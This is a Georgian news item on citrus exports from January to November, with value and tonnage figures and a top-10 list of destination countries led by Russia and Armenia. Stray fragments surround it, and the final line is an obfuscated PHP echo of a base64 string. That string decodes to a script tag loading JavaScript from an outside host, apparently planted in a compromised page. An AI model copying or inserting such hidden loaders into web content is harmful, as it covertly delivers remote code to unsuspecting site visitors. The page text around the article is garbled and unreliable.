celsiusi
ავერსი შნაიდერი
საქართველოდან 11 თვეში მსოფლიოს სხვადასხვა ქვეყანაში 13.7 მლნ დოლარის ღირებულების 25 934 ტონა ციტრუსის ექსპორტი განხორციელდა. ეს მაჩვენებელი ღირებულებით და მოცულობით, როგორც გასული წლის ასევე პანდემიამდე წლის მაჩვენებელს აღემატება. (2020 წელი - 11.5 მლნ დოლარი, 21 813 ტონა; 2019 წელი - 7.8 მლნ დოლარი, 14 033 ტონა). 11 თვეში გასული წლის ამავე პერიოდთან შედარებით ექსპორტირებული პროდუქტის ღირებულება 19.2%-ით გაიზარდა, ხოლო მოცულობა - 18.9%-ით.
 
აღსანიშნია, რომ მიმდინარე წლის იანვარ-ნოემბერში ციტრუსის საექსპორტო მაჩვენებლები რეკორდულია.
 
წლების განმავლობაში საქართველოსთვის ციტრუსის მთავარი საექსპორტო ბაზრები რეგიონის ქვეყნები იყო. მცირე რაოდენობის პროდუქტის ექსპორტი ევროკავშირის და სხვა ქვეყნებშიც ხორციელდებოდა. რაც შეეხება მიმდინარე წლის მთავარ საექსპორტო ბაზრებს, მათი TOP-10-ეული ასეთია:
 
1. რუსეთი - 7.8 მლნ დოლარი, 13 145 ტონა;
2. სომხეთი - 5 მლნ დოლარი, 10 407 ტონა;
3. უკრაინა - 441.8 ათასი დოლარი, 1 265 ტონა;
4. აზერბაიჯანი - 196.6 ათასი დოლარი, 458 ტონა;
5. მოლდოვა - 80.8 ათასი დოლარი, 262.3 ტონა;
6. გერმანია - 67.7 ათასი დოლარი, 19 ტონა;
7. ყაზახეთი - 42.3 ათასი დოლარი, 88 ტონა;
8. ყატარი - 23.1 ათასი დოლარი, 19 ტონა;
9. სლოვენია - 20.1 ათასი დოლარი, 70 ტონა;
10. ყირგიზეთი - 20 ათასი დოლარი, 60 ტონა.
 
ოფიციალური სტატისტიკის მიხედვით, ამავე პერიოდში საქართველომ 10.3 მლნ დოლარის 21 007 ტონა ციტრუსი შეიძინა, რაც გასული წლის იანვარ-ნოემბრის მაჩვენებელს 9.9%-ით ჩამორჩება. ძირითადი საიმპორტო ქვეყნების ჩამონათვალში ათეული კი თურქეთი, ეგვიპტე, ნიდერლანდი, სამხრეთ აფრიკა და ირანი შედიან.
1051
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");